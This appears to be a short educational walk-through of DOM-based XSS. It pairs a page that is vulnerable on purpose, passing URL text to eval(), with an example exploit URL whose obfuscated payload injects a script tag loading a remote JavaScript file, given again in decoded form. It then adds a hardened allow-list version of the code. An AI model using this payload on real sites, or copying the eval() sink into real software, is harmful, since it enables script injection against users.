Neonprimetime

DOM XSS 101 Walk-Through

Jan 4th, 2016
DOM XSS 101 Walk-Through
*******
Blog discussing this: http://neonprimetime.blogspot.com/2016/01/dom-xss-101-walk-through.html
*******
<html>
<body>
<script type="text/javascript">
    function logUserId(userid){
        console.log('debug: userid found was \'' + userid + '\'');
    }
    // Source: the full URL, including everything after "userid=" in the query string.
    var myurl = window.location.href;
    var useridstartindex = myurl.indexOf("userid=") + 7;
    var userid = myurl.substring(useridstartindex,myurl.length);
    // Sink: the untrusted value is concatenated into a string that is handed to eval().
    var calllogfunction = 'logUserId(' + userid.toString() + ')';
    eval(calllogfunction);
</script>
</body>
</html>
<!-- DOM XSS Example url: hxxp://myurl.com/domxsstest.html?userid=123456);eval(String.fromCharCode(115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,110,101,111,110,112,114,105,109,101,116,105,109,101,46,98,108,111,103,115,112,111,116,46,99,111,109,47,102,97,107,101,104,111,111,107,46,106,115,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59))// -->
<!-- DOM XSS Example code: s=document.createElement('script'); s.src='http://neonprimetime.blogspot.com/fakehook.js'; document.getElementsByTagName('head')[0].appendChild(s); -->
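The same userid handling written two ways, as an added example that is not part of the original paste: the vulnerable string-building from the page (returned for inspection instead of passed to eval()) beside a hardened version that parses the query string and allow-lists the value. The host name and the tampered sample URL are constructed for the demo; the code runs in Node or a browser.

```javascript
// Added example (not from the original paste): vulnerable vs. hardened
// handling of the userid parameter from the DOM XSS walk-through.

// Vulnerable version, mirroring the paste: everything after "userid=" is
// spliced into a string that the original code hands to eval(). Here the
// string is only returned so it can be examined without executing it.
function buildEvalString(href) {
  const start = href.indexOf("userid=") + 7;
  const userid = href.substring(start, href.length);
  return "logUserId(" + userid.toString() + ")";
}

// Hardened version: parse the query string properly, allow-list the value
// (digits only), and never pass attacker-controlled text to eval().
function extractUserId(href) {
  const value = new URL(href).searchParams.get("userid");
  if (value === null || !/^\d{1,12}$/.test(value)) {
    return null; // reject anything that is not a plain numeric id
  }
  return value;
}

function logUserId(userid) {
  // Same debug logging as the paste, but invoked directly, not via eval().
  console.log("debug: userid found was '" + userid + "'");
  return userid;
}

// Constructed sample URLs (hypothetical host): a benign one and one whose
// parameter closes the call and appends a second JavaScript statement.
const BENIGN = "http://myurl.example/domxsstest.html?userid=123456";
const TAMPERED = "http://myurl.example/domxsstest.html?userid=123456);tampered()//";

function demo() {
  const results = {
    vulnBenign: buildEvalString(BENIGN),      // "logUserId(123456)"
    vulnTampered: buildEvalString(TAMPERED),  // call is closed early, extra statement follows
    safeBenign: extractUserId(BENIGN),        // "123456"
    safeTampered: extractUserId(TAMPERED),    // null: fails the digits-only check
  };
  if (results.safeBenign !== null) logUserId(results.safeBenign);
  return results;
}

demo();
```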


*******
*******
*******
More FROM @neonprimetime security

http://pastebin.com/u/Neonprimetime
https://www.virustotal.com/en/USER/neonprimetime/
https://twitter.com/neonprimetime
https://www.reddit.com/USER/neonprimetime